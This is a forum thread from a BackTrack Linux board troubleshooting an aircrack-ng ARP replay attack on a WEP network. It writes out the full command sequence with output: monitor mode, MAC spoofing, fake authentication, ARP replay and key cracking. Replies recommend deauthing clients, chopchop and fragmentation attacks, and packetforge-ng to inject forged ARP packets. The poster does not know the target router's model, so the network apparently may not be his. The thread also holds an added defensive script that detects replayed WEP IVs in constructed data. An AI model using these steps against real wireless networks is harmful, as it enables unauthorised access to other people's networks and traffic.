
Thread: Ralink RT2870/3070 - "got 0 ARP requests,0 packets send"

  1. #1
    Just burned his ISO
    Join Date
    May 2012
    Posts
    6

    Question Ralink RT2870/3070 - "got 0 ARP requests,0 packets send"

    Hello everyone.

    First of all I made a search in the wiki and in this forum but I didn't find anything relevant. On Google there are many people having my same problem, but the only solution I found is "enable monitor mode and wait", and it doesn't work for me.

    >> Introduction:
    I'm using Backtrack 5 R2 (live cd). GNOME. Architecture: 64-bit
    My chipset is Ralink RT2870/3070 and according to the official wiki it works: http://www.backtrack-linux.org/wiki/..._working_cards

    I also ran the injection test myself (aireplay-ng -9 wlan1) and it says "injection working!" and then lists the available APs. I did this after changing the channel of my interface to the channel where the target AP is: iwconfig wlan1 channel 6 (it is wlan1, and not wlan0, because I have two wireless adapters).

    My problem is that airodump gets many packets but "0 ARP requests" and "send 0 packets"

    >> Details
    (Of course, where I say <my fake mac>, <my target mac> etc., that is just for privacy, but I wrote the correct MACs.)
    Here is what I did:

    airmon-ng start wlan1

    Code:
    Interface	Chipset		Driver
    
    wlan1		Ralink RT2870/3070	rt2800usb - [phy1]
    				(monitor mode enabled on mon0)
    wlan0		Atheros AR9285	ath9k - [phy0]

    aireplay-ng -9 mon0

    Code:
    04:50:57  Trying broadcast probe requests...
    04:50:57  Injection is working!
    04:50:59  Found 10 APs
    
    04:50:59  Trying directed probe requests...
    04:50:59  <mac> - channel: 6 - 'AP_NAME'
    04:50:59  Ping (min/avg/max): 1.418ms/3.128ms/7.077ms Power: -67.87
    04:50:59  30/30: 100%
    
    < More AP >

    airmon-ng start mon0 6

    Code:
    Interface	Chipset		Driver
    
    mon0		Ralink RT2870/3070	rt2800usb - [phy1]
    				(monitor mode enabled on mon1)
    wlan1		Ralink RT2870/3070	rt2800usb - [phy1]
    wlan0		Atheros AR9285	ath9k - [phy0]

    ifconfig mon0 down
    macchanger --mac <fake mac> mon0

    Code:
    Current MAC: <my wlan1/mon0/mon1 true mac> (<mac producer>)
    Faked MAC:   <fake mac> (unknown)

    airodump-ng -c 6 -w wep123 --bssid <my target mac> mon1

    (Partial output, I can't copy-paste from the window because it refreshes every second)
    Code:
    ***
    CH 6 ] [Elapsed: 3 mins] <date> <hour>
    BSSID PWR ......
    <my target mac> -37 24 ....
    
    BSSID STATION ......

    ==> ctrl+shift+N to Open a new console (second console):

    aireplay-ng -1 0 -a <mac of target> -h <fake mac> mon1

    Code:
    05:11:45  Sending Authentication Request (Open System) [ACK]
    05:11:45  Authentication successful
    05:11:45  Sending Association Request [ACK]
    
    <looping the same 3 lines..>

    After this I noticed a new line appeared in the first console***

    Updated code:
    Code:
    ***
    CH 6 ] [Elapsed: 3 mins] <date> <hour>
    BSSID PWR ......
    <my target mac> -37 24 ....
    
    BSSID STATION .....
    <target mac> <my fake mac> ...

    ==> ctrl+shift+N to Open a new console (third console):

    aireplay-ng -3 -b <mac of target> -h <fake mac> mon1

    Code:
    05:16:45  Waiting for beacon frame (BSSID: <mac of the target>) on channel 6
    Saving ARP requests in replay_arp-0518-051645.cap
    You should also start airodump-ng to capture replies.
    Read 5797 packets (got 0 ARP requests and 25 ACKs), sent 0 packets...(0 pps)

    And even when 80000 packets have been read, still 0 ARP, 0 sent and 0 pps.

    Finally I tried (in a fourth window):

    aircrack-ng -b <mac of target> replay_arp-0518-051645.cap

    Code:
    Opening replay_arp-0518-051645.cap
    No matching network found - check your bssid.
    
    
    Quitting aircrack-ng...

    The solutions I tried are:
    - airodump-ng -c 6 -w wep123 --bssid <my target mac> mon0 (and also using mon0 instead of mon1 in the following steps)
    - I tried to use my true MAC and also the fake MAC in combination with mon0 and/or mon1
    - I tried to first start capturing packets, then putting in

    But the result is always the same.

    Thank you for any hint!
    Regards

  2. #2
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: Ralink RT2870/3070 - "got 0 ARP requests,0 packets send"

    I would suggest that you go to the aircrack official website and document yourself more about what this attack does, you are missing one of the key steps in getting it to work so in your case it's normal that you can not capture ARP requests.
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  3. #3
    Just burned his ISO
    Join Date
    May 2012
    Posts
    6

    Question Re: Ralink RT2870/3070 - "got 0 ARP requests,0 packets send"

    Quote Originally Posted by sickness View Post
    I would suggest that you go to the aircrack official website and document yourself more about what this attack does, you are missing one of the key steps in getting it to work so in your case it's normal that you can not capture ARP requests.
    @sickness First of all thank you very much for answering.
    I'd like to ask you: what step am I missing?
    I've already followed various tutorials (from different sources) and of course made some searches on the aircrack website, but I'm confused. I really don't have any idea what I'm doing wrong. I don't expect you to tell me exactly "what command to write", but please tell me what "action" is missing.

    Thank you very much for helping
    Regards

  4. #4
    Just burned his ISO
    Join Date
    May 2012
    Posts
    6

    Default Re: Ralink RT2870/3070 - "got 0 ARP requests,0 packets send"

    Quote Originally Posted by dragmnl123 View Post
    @sickness First of all thank you very much for answering.
    I'd like to ask you: what step am I missing?
    I've already followed various tutorials (from different sources) and of course made some searches on the aircrack website, but I'm confused. I really don't have any idea what I'm doing wrong. I don't expect you to tell me exactly "what command to write", but please tell me what "action" is missing.

    Thank you very much for helping
    Regards
    Any hint, please? I looked on the aircrack website but I really can't understand what's missing.

  5. #5
    Very good friend of the forum maverik35's Avatar
    Join Date
    Sep 2009
    Location
    Debian land
    Posts
    734

    Default Re: Ralink RT2870/3070 - "got 0 ARP requests,0 packets send"

    What router are you auditing?

    Try another attack, you are using the Fake Auth attack. Try chop-chop, fragmentation, interactive packet.

    Not all injected packets are allowed by the router. That is why it is not capturing any packets: because the router is not accepting the injected packets, no Initialization Vectors (IVs) are issued by the router... Try another attack... This is not as simple as "I'm injecting", "Easy as 123". No, please, no... Do not take anything for granted...

    You try to attack and if it fails, try another attack... Analyze the info from airodump-ng before attacking with aireplay-ng. Please, also try to read all the info airodump is showing in your terminal...

    Read here: http://www.aircrack-ng.org/doku.php?id=aireplay-ng.

    Good luck...

  6. #6
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: Ralink RT2870/3070 - "got 0 ARP requests,0 packets send"

    You need to generate arp traffic to use an arp replay attack. Either deauth a client, or if there is none, korek or chopchop to get the keystream, and packetforge a fake arp then replay. At this point using a -3 attack as opposed to a -2 -r [fake arp] is stupid, but theoretically it can be done. The step you are missing is having real traffic generated and playing with it...

    @sickness: TRY HARDER FTW!!!
    World Domination is such an ugly phrase. I prefer the term World Optimization.
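
Seen from the monitoring side, the ARP replay (-3) discussed in this thread re-sends one captured encrypted frame over and over, so a single transmitter repeats the same WEP IV at a high rate. The following is an added example, not part of any post in this thread: a detector run over constructed frame records, where the record layout, the MAC addresses, the window and the threshold are all assumptions.

```python
from collections import defaultdict

def find_replayed_frames(frames, window_ms=1000, threshold=20):
    """Flag (transmitter, iv, length) tuples seen >= threshold times within
    window_ms. frames: iterable of (ts_ms, transmitter, iv_hex, length)."""
    seen = defaultdict(list)
    for ts_ms, transmitter, iv_hex, length in frames:
        seen[(transmitter, iv_hex, length)].append(ts_ms)

    alerts = {}
    for key, times in seen.items():
        times.sort()
        start = best = 0
        # Sliding window: largest number of repeats inside any window_ms span.
        for end, ts in enumerate(times):
            while ts - times[start] > window_ms:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts[key] = best
    return alerts

def build_sample():
    """Constructed capture metadata; every value here is made up."""
    client, injector = "02:00:00:00:00:01", "02:00:00:00:00:aa"
    # Ordinary station: a fresh IV on every frame.
    frames = [(i * 20, client, f"{i:06x}", 100 + i % 7) for i in range(50)]
    # One link-layer retry repeats an IV once; this must not raise an alert.
    frames.append((201, client, "00000a", 103))
    # Replay pattern: the same frame (same IV, same size) 200 times in 0.4 s.
    frames += [(5000 + i * 2, injector, "a1b2c3", 68) for i in range(200)]
    return frames

if __name__ == "__main__":
    for (mac, iv, length), count in find_replayed_frames(build_sample()).items():
        print(f"{mac} repeated IV {iv} ({length} bytes) {count}x within 1 s")
```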

  7. #7
    Just burned his ISO
    Join Date
    May 2012
    Posts
    6

    Default Re: Ralink RT2870/3070 - "got 0 ARP requests,0 packets send"

    @ShadowMaster Could you speak more clearly to a "newbie"? For example... what's korek? And packetforge?
    @maverik35 Well, I don't know the router model. And finally I got an ARP response, simply by repeating many times the steps I described in the beginning. I also tried every other attack available in aireplay-ng. The only "result" has been with the "ARP replay" attack (-3): I got many IVs (as many as 7000-8000 in 5-6-7 hours) but neither with aircrack-ptw nor with aircrack-ptw did I get the key.

    However I'll try more times

  8. #8
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: Ralink RT2870/3070 - "got 0 ARP requests,0 packets send"

    korek==chopchop==-4 or -5, don't recall which. The other is the packet fragmentation attack. Either one will get you a PRGA keystream .xor that you can then use with packetforge to forge an ARP packet to inject with -2 -r [packet]. Also 7000-8000 is in general nowhere near enough to crack... When you successfully use -5 or -4 to gain a PRGA keystream, then either look up packetforge usage or post again here for further info.
    World Domination is such an ugly phrase. I prefer the term World Optimization.

  9. #9
    Just burned his ISO
    Join Date
    Jun 2012
    Posts
    1

    Unhappy Re: Ralink RT2870/3070 - "got 0 ARP requests,0 packets send"

    Brother, I have the same problem. I have a wireless D-Link DWA-125, chipset RT2870/3070.
    Did you manage to get a WEP key? How?
